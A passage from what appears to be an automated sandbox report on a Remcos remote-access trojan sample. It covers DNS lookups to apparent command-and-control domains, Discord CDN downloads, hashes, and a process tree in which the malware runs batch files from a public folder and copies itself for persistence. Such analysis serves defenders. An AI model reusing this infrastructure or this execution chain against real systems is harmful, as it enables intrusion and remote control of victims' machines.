                                          Jun 4, 2021 09:41:29.790783882 CEST192.168.2.48.8.8.80x5d38Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:30.856579065 CEST192.168.2.48.8.8.80x22d3Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:32.107619047 CEST192.168.2.48.8.8.80x32b1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:33.167161942 CEST192.168.2.48.8.8.80x54cdStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:34.388963938 CEST192.168.2.48.8.8.80xaf5Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:35.449734926 CEST192.168.2.48.8.8.80x4e71Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:36.683897972 CEST192.168.2.48.8.8.80x7148Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:37.807146072 CEST192.168.2.48.8.8.80x1ad8Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:39.149837017 CEST192.168.2.48.8.8.80x9738Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:40.482820988 CEST192.168.2.48.8.8.80xeb4eStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:41.715715885 CEST192.168.2.48.8.8.80x6600Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:42.777014971 CEST192.168.2.48.8.8.80xad4Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:43.996402025 CEST192.168.2.48.8.8.80x793Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:45.058801889 CEST192.168.2.48.8.8.80x5657Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:46.277839899 CEST192.168.2.48.8.8.80x2653Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:47.362359047 CEST192.168.2.48.8.8.80x7ab2Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:48.591324091 CEST192.168.2.48.8.8.80x35d4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:49.652962923 CEST192.168.2.48.8.8.80xd25Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:50.874732971 CEST192.168.2.48.8.8.80xaeadStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:51.934591055 CEST192.168.2.48.8.8.80xdbc9Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:53.155333042 CEST192.168.2.48.8.8.80x4dStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:54.217448950 CEST192.168.2.48.8.8.80x2254Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:55.435005903 CEST192.168.2.48.8.8.80x80a1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:56.497416019 CEST192.168.2.48.8.8.80x4054Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:57.716850996 CEST192.168.2.48.8.8.80x337aStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:58.778393984 CEST192.168.2.48.8.8.80x7eaeStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:59.995588064 CEST192.168.2.48.8.8.80x8ef4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:01.040570021 CEST192.168.2.48.8.8.80x6fbeStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:02.247749090 CEST192.168.2.48.8.8.80xf03cStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:03.308010101 CEST192.168.2.48.8.8.80x70d4Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:04.529351950 CEST192.168.2.48.8.8.80xd48eStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:16.129209995 CEST8.8.8.8192.168.2.40x559fNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:17.515693903 CEST8.8.8.8192.168.2.40x89d1Server failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:18.656070948 CEST8.8.8.8192.168.2.40xb28fNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:19.881160975 CEST8.8.8.8192.168.2.40xd1a1Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:20.940700054 CEST8.8.8.8192.168.2.40x3c4No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:22.180686951 CEST8.8.8.8192.168.2.40x54e8Server failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:23.238006115 CEST8.8.8.8192.168.2.40xd2eNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:24.458822012 CEST8.8.8.8192.168.2.40x9c86Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:25.520107031 CEST8.8.8.8192.168.2.40x9f28No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:26.738759995 CEST8.8.8.8192.168.2.40x2b4aName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:27.899045944 CEST8.8.8.8192.168.2.40xa26bNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.469103098 CEST8.8.8.8192.168.2.40xa7d5Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:30.605134964 CEST8.8.8.8192.168.2.40x1860No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:32.028281927 CEST8.8.8.8192.168.2.40xf6ccServer failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:33.085849047 CEST8.8.8.8192.168.2.40xfa74No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:34.285319090 CEST8.8.8.8192.168.2.40x59f6Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:35.394838095 CEST8.8.8.8192.168.2.40xa0a0No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:36.664606094 CEST8.8.8.8192.168.2.40xef6fName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.735856056 CEST8.8.8.8192.168.2.40xbefaNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.959199905 CEST8.8.8.8192.168.2.40xbefaNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:39.940066099 CEST8.8.8.8192.168.2.40xaeeName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:41.000473976 CEST8.8.8.8192.168.2.40xd728No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:42.285602093 CEST8.8.8.8192.168.2.40xdc3dServer failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:43.352905035 CEST8.8.8.8192.168.2.40xb7a7No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:44.667825937 CEST8.8.8.8192.168.2.40xe6a4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:45.728987932 CEST8.8.8.8192.168.2.40x9e3dNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:47.670643091 CEST8.8.8.8192.168.2.40x7e16Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:49.019717932 CEST8.8.8.8192.168.2.40x4089No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:50.223773003 CEST8.8.8.8192.168.2.40x4bbdName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:51.287056923 CEST8.8.8.8192.168.2.40xc9fcNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:52.494193077 CEST8.8.8.8192.168.2.40xf5bServer failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:53.551012993 CEST8.8.8.8192.168.2.40xf78eNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:54.753180981 CEST8.8.8.8192.168.2.40xd592Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:55.813472033 CEST8.8.8.8192.168.2.40xdb85No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:57.156025887 CEST8.8.8.8192.168.2.40x13c7Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:58.218678951 CEST8.8.8.8192.168.2.40x4c29No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:59.560050964 CEST8.8.8.8192.168.2.40x936cName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:00.669122934 CEST8.8.8.8192.168.2.40x45ceNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:02.001405954 CEST8.8.8.8192.168.2.40x4f6dName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:03.061315060 CEST8.8.8.8192.168.2.40x135aNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:04.290596962 CEST8.8.8.8192.168.2.40xc8d0Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:05.429944038 CEST8.8.8.8192.168.2.40xf803No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:06.830806971 CEST8.8.8.8192.168.2.40xbf57Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:07.903352022 CEST8.8.8.8192.168.2.40xbfdeNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:09.129702091 CEST8.8.8.8192.168.2.40x1fe4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:10.197743893 CEST8.8.8.8192.168.2.40xfe4aNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:11.409699917 CEST8.8.8.8192.168.2.40x20b0Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:12.471990108 CEST8.8.8.8192.168.2.40xa7b0No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:13.701833963 CEST8.8.8.8192.168.2.40x8da9Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:14.761611938 CEST8.8.8.8192.168.2.40xcb28No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:15.979192019 CEST8.8.8.8192.168.2.40x84aName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:17.167419910 CEST8.8.8.8192.168.2.40x6cccNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:18.453221083 CEST8.8.8.8192.168.2.40x5dc6Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:19.515099049 CEST8.8.8.8192.168.2.40xf0dfNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:20.731895924 CEST8.8.8.8192.168.2.40x37f3Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:21.794507027 CEST8.8.8.8192.168.2.40x1ba3No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:23.012999058 CEST8.8.8.8192.168.2.40x5b84Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:24.065589905 CEST8.8.8.8192.168.2.40xfa28No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:25.277705908 CEST8.8.8.8192.168.2.40x11deName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:26.342190981 CEST8.8.8.8192.168.2.40xc8dfNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:27.559171915 CEST8.8.8.8192.168.2.40xc7dcName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:28.619645119 CEST8.8.8.8192.168.2.40x1bb7No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:29.840023994 CEST8.8.8.8192.168.2.40x5d38Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:30.906867027 CEST8.8.8.8192.168.2.40x22d3No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:32.156562090 CEST8.8.8.8192.168.2.40x32b1Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:33.215828896 CEST8.8.8.8192.168.2.40x54cdNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:34.438519001 CEST8.8.8.8192.168.2.40xaf5Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:35.498428106 CEST8.8.8.8192.168.2.40x4e71No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:36.733165979 CEST8.8.8.8192.168.2.40x7148Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:37.855993032 CEST8.8.8.8192.168.2.40x1ad8No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:39.199364901 CEST8.8.8.8192.168.2.40x9738Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:40.531407118 CEST8.8.8.8192.168.2.40xeb4eNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:41.765302896 CEST8.8.8.8192.168.2.40x6600Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:42.827914000 CEST8.8.8.8192.168.2.40xad4No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:44.045500994 CEST8.8.8.8192.168.2.40x793Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:45.107799053 CEST8.8.8.8192.168.2.40x5657No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:46.326437950 CEST8.8.8.8192.168.2.40x2653Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:47.411079884 CEST8.8.8.8192.168.2.40x7ab2No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:48.640156031 CEST8.8.8.8192.168.2.40x35d4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:49.694082975 CEST8.8.8.8192.168.2.40xd25No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:50.925890923 CEST8.8.8.8192.168.2.40xaeadName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:51.975991011 CEST8.8.8.8192.168.2.40xdbc9No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:53.196373940 CEST8.8.8.8192.168.2.40x4dName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:54.265856028 CEST8.8.8.8192.168.2.40x2254No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:55.483614922 CEST8.8.8.8192.168.2.40x80a1Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:56.548612118 CEST8.8.8.8192.168.2.40x4054No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:57.765820980 CEST8.8.8.8192.168.2.40x337aName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:58.829729080 CEST8.8.8.8192.168.2.40x7eaeNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:00.037149906 CEST8.8.8.8192.168.2.40x8ef4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:01.081743956 CEST8.8.8.8192.168.2.40x6fbeNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:02.300141096 CEST8.8.8.8192.168.2.40xf03cName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:03.358968019 CEST8.8.8.8192.168.2.40x70d4No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:04.572482109 CEST8.8.8.8192.168.2.40xd48eName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)

                                          HTTPS Packets

                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                          Jun 4, 2021 09:39:57.388297081 CEST162.159.130.233443192.168.2.449729CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                          Jun 4, 2021 09:40:30.392745972 CEST162.159.134.233443192.168.2.449755CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                          Jun 4, 2021 09:40:38.192769051 CEST162.159.133.233443192.168.2.449759CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:09:39:53
                                          Start date:04/06/2021
                                          Path:C:\Users\user\Desktop\V8IB839cvz.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\V8IB839cvz.exe'
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Reputation:low

                                          General

                                          Start time:09:40:14
                                          Start date:04/06/2021
                                          Path:C:\Users\user\Desktop\V8IB839cvz.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\V8IB839cvz.exe
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:09:40:15
                                          Start date:04/06/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:09:40:15
                                          Start date:04/06/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:09:40:16
                                          Start date:04/06/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:09:40:16
                                          Start date:04/06/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:09:40:23
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\Public\Xypgtv\Xypgtv.exe'
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
